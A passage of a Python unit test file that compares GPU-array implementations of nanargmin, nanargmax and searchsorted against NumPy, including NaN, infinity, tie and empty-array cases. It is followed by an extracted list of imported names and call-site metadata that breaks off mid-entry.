a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmin(a, axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_tie(self, xp, dtype):
a = xp.array([0, 5, 2, 3, 4, 5], dtype)
return xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmin_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
xp.nanargmin(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmin_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
return xp.nanargmin(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmin_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return xp.nanargmin(a, axis=1)
@testing.gpu
class TestNanArgMax(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_all(self, xp, dtype):
a = testing.shaped_random((2, 3), xp, dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan(self, xp, dtype):
a = xp.array([float('nan'), -1, 1], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan2(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan3(self, xp, dtype):
a = xp.array([float('nan'), float('nan'), -1, 1, 1.0, -2.0], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan4(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan')],
dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(accept_error=ValueError)
def test_nanargmax_nan5(self, xp, dtype):
a = xp.array([-1, 1, 1.0, -2.0, float('nan'), float('nan'), -1, 1],
dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis_large(self, xp, dtype):
a = testing.shaped_random((3, 1000), xp, dtype)
return xp.nanargmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis0(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis1(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmax(a, axis=1)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_axis2(self, xp, dtype):
a = testing.shaped_random((2, 3, 4), xp, dtype)
return xp.nanargmax(a, axis=2)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_tie(self, xp, dtype):
a = xp.array([0, 5, 2, 3, 4, 5], dtype)
return xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmax_zero_size(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
xp.nanargmax(a)
@testing.for_all_dtypes(no_complex=True)
def test_nanargmax_zero_size_axis0(self, dtype):
for xp in (numpy, cupy):
a = testing.shaped_random((0, 1), xp, dtype)
with pytest.raises(ValueError):
return xp.nanargmax(a, axis=0)
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose()
def test_nanargmax_zero_size_axis1(self, xp, dtype):
a = testing.shaped_random((0, 1), xp, dtype)
return xp.nanargmax(a, axis=1)
@testing.gpu
@testing.parameterize(*testing.product(
{'bins': [
[],
[0, 1, 2, 4, 10],
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
[0.0, 1.0, 2.5, 4.0, 10.0],
[-1.0, 1.0, 2.5, 4.0, 20.0],
[1.5, 2.5, 4.0, 6.0],
[float('-inf'), 1.5, 2.5, 4.0, 6.0],
[1.5, 2.5, 4.0, 6.0, float('inf')],
[float('-inf'), 1.5, 2.5, 4.0, 6.0, float('inf')],
[0.0, 1.0, 1.0, 4.0, 4.0, 10.0],
[0.0, 1.0, 1.0, 4.0, 4.0, 4.0, 4.0, 10.0],
],
'side': ['left', 'right'],
'shape': [(), (10,), (6, 3, 3)]})
)
class TestSearchSorted(unittest.TestCase):
@testing.for_all_dtypes(no_bool=True)
@testing.numpy_cupy_array_equal()
def test_searchsorted(self, xp, dtype):
x = testing.shaped_arange(self.shape, xp, dtype)
bins = xp.array(self.bins)
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.gpu
@testing.parameterize(
{'side': 'left'},
{'side': 'right'})
class TestSearchSortedNanInf(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_searchsorted_nanbins(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
bins = xp.array([0, 1, 2, 4, 10, float('nan')])
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.numpy_cupy_array_equal()
def test_searchsorted_nan(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
x[5] = float('nan')
bins = xp.array([0, 1, 2, 4, 10])
y = xp.searchsorted(bins, x, side=self.side)
return y,
# DPNP_BUG
# Segmentation fault on access to negative index # x[-1] = float('nan') #######
# @testing.numpy_cupy_array_equal()
# def test_searchsorted_nan_last(self, xp):
# x = testing.shaped_arange((10,), xp, xp.float64)
# x[-1] = float('nan')
# bins = xp.array([0, 1, 2, 4, float('nan')])
# y = xp.searchsorted(bins, x, side=self.side)
# return y,
# @testing.numpy_cupy_array_equal()
# def test_searchsorted_nan_last_repeat(self, xp):
# x = testing.shaped_arange((10,), xp, xp.float64)
# x[-1] = float('nan')
# bins = xp.array([0, 1, 2, float('nan'), float('nan')])
# y = xp.searchsorted(bins, x, side=self.side)
# return y,
# @testing.numpy_cupy_array_equal()
# def test_searchsorted_all_nans(self, xp):
# x = testing.shaped_arange((10,), xp, xp.float64)
# x[-1] = float('nan')
# bins = xp.array([float('nan'), float('nan'), float('nan'),
# float('nan'), float('nan')])
# y = xp.searchsorted(bins, x, side=self.side)
# return y,
###############################################################################
@testing.numpy_cupy_array_equal()
def test_searchsorted_inf(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
x[5] = float('inf')
bins = xp.array([0, 1, 2, 4, 10])
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.numpy_cupy_array_equal()
def test_searchsorted_minf(self, xp):
x = testing.shaped_arange((10,), xp, xp.float64)
x[5] = float('-inf')
bins = xp.array([0, 1, 2, 4, 10])
y = xp.searchsorted(bins, x, side=self.side)
return y,
@testing.gpu
class TestSearchSortedInvalid(unittest.TestCase):
# Cant test unordered bins due to numpy undefined
# behavior for searchsorted
def test_searchsorted_ndbins(self):
for xp in (numpy, cupy):
x = testing.shaped_arange((10,), xp, xp.float64)
bins = xp.array([[10, 4], [2, 1], [7, 8]])
with pytest.raises(ValueError):
xp.searchsorted(bins, x)
@testing.gpu
class TestSearchSortedWithSorter(unittest.TestCase):
@testing.numpy_cupy_array_equal()
def test_sorter(self, xp):
x = testing.shaped_arange((12,), xp, xp.float64)
bins = xp.array([10, 4, 2, 1, 8])
sorter = xp.array([3, 2, 1, 4, 0])
y = xp.searchsorted(bins, x, sorter=sorter)
return y,
def test_invalid_sorter(self):
for xp in (numpy, cupy):
x = testing.shaped_arange((12,), xp, xp.float64)
bins = xp.array([10, 4, 2, 1, 8])
sorter = xp.array([0])
with pytest.raises(ValueError):
xp.searchsorted(bins, x, sorter=sorter)
def test_nonint_sorter(self):
for xp in (numpy, cupy):
x = testing.shaped_arange((12,), xp, xp.float64)
bins = xp.array([10, 4, 2, 1, 8])
sorter = xp.array([], dtype=xp.float64)
with pytest.raises(TypeError):
xp.searchsorted(bins, x, sorter=sorter)
|
[
"tests.third_party.cupy.testing.product",
"tests.third_party.cupy.testing.for_all_dtypes",
"tests.third_party.cupy.testing.parameterize",
"tests.third_party.cupy.testing.for_all_dtypes_combination",
"numpy.empty",
"tests.third_party.cupy.testing.with_requires",
"pytest.raises",
"tests.third_party.cupy.testing.shaped_random",
"numpy.array",
"tests.third_party.cupy.testing.shaped_arange",
"tests.third_party.cupy.testing.for_dtypes",
"tests.third_party.cupy.testing.numpy_cupy_allclose",
"tests.third_party.cupy.testing.numpy_cupy_array_equal"
] |
[((8409, 8713), 'tests.third_party.cupy.testing.parameterize', 'testing.parameterize', (["{'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4), 'y_shape': (2, 3, 4)}", "{'cond_shape': (4,), 'x_shape': (2, 3, 4), 'y_shape': (2, 3, 4)}", "{'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4), 'y_shape': (3, 4)}", "{'cond_shape': (3, 4), 'x_shape': (2, 3, 4), 'y_shape': (4,)}"], {}), "({'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4),\n 'y_shape': (2, 3, 4)}, {'cond_shape': (4,), 'x_shape': (2, 3, 4),\n 'y_shape': (2, 3, 4)}, {'cond_shape': (2, 3, 4), 'x_shape': (2, 3, 4),\n 'y_shape': (3, 4)}, {'cond_shape': (3, 4), 'x_shape': (2, 3, 4),\n 'y_shape': (4,)})\n", (8429, 8713), False, 'from tests.third_party.cupy import testing\n'), ((9415, 9540), 'tests.third_party.cupy.testing.parameterize', 'testing.parameterize', (["{'cond_shape': (2, 3, 4)}", "{'cond_shape': (4,)}", "{'cond_shape': (2, 3, 4)}", "{'cond_shape': (3, 4)}"], {}), "({'cond_shape': (2, 3, 4)}, {'cond_shape': (4,)}, {\n 'cond_shape': (2, 3, 4)}, {'cond_shape': (3, 4)})\n", (9435, 9540), False, 'from tests.third_party.cupy import testing\n'), ((10697, 10735), 'tests.third_party.cupy.testing.with_requires', 'testing.with_requires', (['"""numpy>=1.17.0"""'], {}), "('numpy>=1.17.0')\n", (10718, 10735), False, 'from tests.third_party.cupy import testing\n'), ((20142, 20199), 'tests.third_party.cupy.testing.parameterize', 'testing.parameterize', (["{'side': 'left'}", "{'side': 'right'}"], {}), "({'side': 'left'}, {'side': 'right'})\n", (20162, 20199), False, 'from tests.third_party.cupy import testing\n'), ((203, 242), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (225, 242), False, 'from tests.third_party.cupy import testing\n'), ((248, 277), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (275, 277), False, 'from tests.third_party.cupy import testing\n'), ((405, 444), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (427, 444), False, 'from tests.third_party.cupy import testing\n'), ((450, 479), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (477, 479), False, 'from tests.third_party.cupy import testing\n'), ((618, 657), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (640, 657), False, 'from tests.third_party.cupy import testing\n'), ((663, 715), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (690, 715), False, 'from tests.third_party.cupy import testing\n'), ((841, 880), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (863, 880), False, 'from tests.third_party.cupy import testing\n'), ((886, 915), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (913, 915), False, 'from tests.third_party.cupy import testing\n'), ((1059, 1098), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (1081, 1098), False, 'from tests.third_party.cupy import testing\n'), ((1104, 1133), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (1131, 1133), False, 'from tests.third_party.cupy import testing\n'), ((1290, 1329), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (1312, 1329), False, 'from tests.third_party.cupy import testing\n'), ((1335, 1364), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (1362, 1364), False, 'from tests.third_party.cupy import testing\n'), ((1503, 1542), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (1525, 1542), False, 'from tests.third_party.cupy import testing\n'), ((1548, 1577), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (1575, 1577), False, 'from tests.third_party.cupy import testing\n'), ((1716, 1755), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (1738, 1755), False, 'from tests.third_party.cupy import testing\n'), ((1761, 1790), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (1788, 1790), False, 'from tests.third_party.cupy import testing\n'), ((1929, 1968), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (1951, 1968), False, 'from tests.third_party.cupy import testing\n'), ((1974, 2003), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (2001, 2003), False, 'from tests.third_party.cupy import testing\n'), ((2126, 2165), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (2148, 2165), False, 'from tests.third_party.cupy import testing\n'), ((2377, 2416), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (2399, 2416), False, 'from tests.third_party.cupy import testing\n'), ((2640, 2679), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (2662, 2679), False, 'from tests.third_party.cupy import testing\n'), ((2685, 2714), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (2712, 2714), False, 'from tests.third_party.cupy import testing\n'), ((2860, 2899), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (2882, 2899), False, 'from tests.third_party.cupy import testing\n'), ((2905, 2934), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (2932, 2934), False, 'from tests.third_party.cupy import testing\n'), ((3062, 3101), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (3084, 3101), False, 'from tests.third_party.cupy import testing\n'), ((3107, 3159), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (3134, 3159), False, 'from tests.third_party.cupy import testing\n'), ((3285, 3324), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (3307, 3324), False, 'from tests.third_party.cupy import testing\n'), ((3330, 3359), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (3357, 3359), False, 'from tests.third_party.cupy import testing\n'), ((3498, 3537), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (3520, 3537), False, 'from tests.third_party.cupy import testing\n'), ((3543, 3572), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (3570, 3572), False, 'from tests.third_party.cupy import testing\n'), ((3716, 3755), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (3738, 3755), False, 'from tests.third_party.cupy import testing\n'), ((3761, 3790), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (3788, 3790), False, 'from tests.third_party.cupy import testing\n'), ((3947, 3986), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (3969, 3986), False, 'from tests.third_party.cupy import testing\n'), ((3992, 4021), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (4019, 4021), False, 'from tests.third_party.cupy import testing\n'), ((4160, 4199), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (4182, 4199), False, 'from tests.third_party.cupy import testing\n'), ((4205, 4234), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (4232, 4234), False, 'from tests.third_party.cupy import testing\n'), ((4373, 4412), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (4395, 4412), False, 'from tests.third_party.cupy import testing\n'), ((4418, 4447), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (4445, 4447), False, 'from tests.third_party.cupy import testing\n'), ((4586, 4625), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (4608, 4625), False, 'from tests.third_party.cupy import testing\n'), ((4631, 4660), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (4658, 4660), False, 'from tests.third_party.cupy import testing\n'), ((4783, 4822), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (4805, 4822), False, 'from tests.third_party.cupy import testing\n'), ((5041, 5080), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (5063, 5080), False, 'from tests.third_party.cupy import testing\n'), ((5304, 5343), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (5326, 5343), False, 'from tests.third_party.cupy import testing\n'), ((5349, 5378), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (5376, 5378), False, 'from tests.third_party.cupy import testing\n'), ((7843, 7947), 'tests.third_party.cupy.testing.for_dtypes', 'testing.for_dtypes', ([], {'dtypes': '[numpy.int8, numpy.int16, numpy.int32, numpy.int64]', 'name': '"""result_dtype"""'}), "(dtypes=[numpy.int8, numpy.int16, numpy.int32, numpy.\n int64], name='result_dtype')\n", (7861, 7947), False, 'from tests.third_party.cupy import testing\n'), ((7965, 8004), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'name': '"""in_dtype"""'}), "(name='in_dtype')\n", (7987, 8004), False, 'from tests.third_party.cupy import testing\n'), ((8781, 8856), 'tests.third_party.cupy.testing.for_all_dtypes_combination', 'testing.for_all_dtypes_combination', ([], {'names': "['cond_type', 'x_type', 'y_type']"}), "(names=['cond_type', 'x_type', 'y_type'])\n", (8815, 8856), False, 'from tests.third_party.cupy import testing\n'), ((8871, 8900), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (8898, 8900), False, 'from tests.third_party.cupy import testing\n'), ((9614, 9638), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {}), '()\n', (9636, 9638), False, 'from tests.third_party.cupy import testing\n'), ((9644, 9676), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (9674, 9676), False, 'from tests.third_party.cupy import testing\n'), ((10409, 10433), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {}), '()\n', (10431, 10433), False, 'from tests.third_party.cupy import testing\n'), ((10439, 10471), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (10469, 10471), False, 'from tests.third_party.cupy import testing\n'), ((10793, 10817), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {}), '()\n', (10815, 10817), False, 'from tests.third_party.cupy import testing\n'), ((11285, 11309), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {}), '()\n', (11307, 11309), False, 'from tests.third_party.cupy import testing\n'), ((11315, 11347), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (11345, 11347), False, 'from tests.third_party.cupy import testing\n'), ((11672, 11696), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {}), '()\n', (11694, 11696), False, 'from tests.third_party.cupy import testing\n'), ((11702, 11734), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (11732, 11734), False, 'from tests.third_party.cupy import testing\n'), ((12412, 12451), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (12434, 12451), False, 'from tests.third_party.cupy import testing\n'), ((12457, 12486), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (12484, 12486), False, 'from tests.third_party.cupy import testing\n'), ((12622, 12661), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (12644, 12661), False, 'from tests.third_party.cupy import testing\n'), ((12667, 12719), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (12694, 12719), False, 'from tests.third_party.cupy import testing\n'), ((12853, 12892), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (12875, 12892), False, 'from tests.third_party.cupy import testing\n'), ((12898, 12950), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (12925, 12950), False, 'from tests.third_party.cupy import testing\n'), ((13099, 13138), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (13121, 13138), False, 'from tests.third_party.cupy import testing\n'), ((13144, 13196), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (13171, 13196), False, 'from tests.third_party.cupy import testing\n'), ((13356, 13395), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (13378, 13395), False, 'from tests.third_party.cupy import testing\n'), ((13401, 13453), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (13428, 13453), False, 'from tests.third_party.cupy import testing\n'), ((13634, 13673), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (13656, 13673), False, 'from tests.third_party.cupy import testing\n'), ((13679, 13731), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (13706, 13731), False, 'from tests.third_party.cupy import testing\n'), ((13919, 13958), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (13941, 13958), False, 'from tests.third_party.cupy import testing\n'), ((13964, 13993), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (13991, 13993), False, 'from tests.third_party.cupy import testing\n'), ((14147, 14186), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (14169, 14186), False, 'from tests.third_party.cupy import testing\n'), ((14192, 14221), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (14219, 14221), False, 'from tests.third_party.cupy import testing\n'), ((14370, 14409), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (14392, 14409), False, 'from tests.third_party.cupy import testing\n'), ((14415, 14444), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (14442, 14444), False, 'from tests.third_party.cupy import testing\n'), ((14593, 14632), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (14615, 14632), False, 'from tests.third_party.cupy import testing\n'), ((14638, 14667), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (14665, 14667), False, 'from tests.third_party.cupy import testing\n'), ((14816, 14855), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (14838, 14855), False, 'from tests.third_party.cupy import testing\n'), ((14861, 14890), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (14888, 14890), False, 'from tests.third_party.cupy import testing\n'), ((15021, 15060), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (15043, 15060), False, 'from tests.third_party.cupy import testing\n'), ((15280, 15319), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (15302, 15319), False, 'from tests.third_party.cupy import testing\n'), ((15560, 15599), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (15582, 15599), False, 'from tests.third_party.cupy import testing\n'), ((15605, 15634), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (15632, 15634), False, 'from tests.third_party.cupy import testing\n'), ((15845, 15884), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (15867, 15884), False, 'from tests.third_party.cupy import testing\n'), ((15890, 15919), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (15917, 15919), False, 'from tests.third_party.cupy import testing\n'), ((16055, 16094), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (16077, 16094), False, 'from tests.third_party.cupy import testing\n'), ((16100, 16152), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (16127, 16152), False, 'from tests.third_party.cupy import testing\n'), ((16286, 16325), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (16308, 16325), False, 'from tests.third_party.cupy import testing\n'), ((16331, 16383), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (16358, 16383), False, 'from tests.third_party.cupy import testing\n'), ((16532, 16571), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (16554, 16571), False, 'from tests.third_party.cupy import testing\n'), ((16577, 16629), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (16604, 16629), False, 'from tests.third_party.cupy import testing\n'), ((16789, 16828), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (16811, 16828), False, 'from tests.third_party.cupy import testing\n'), ((16834, 16886), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], 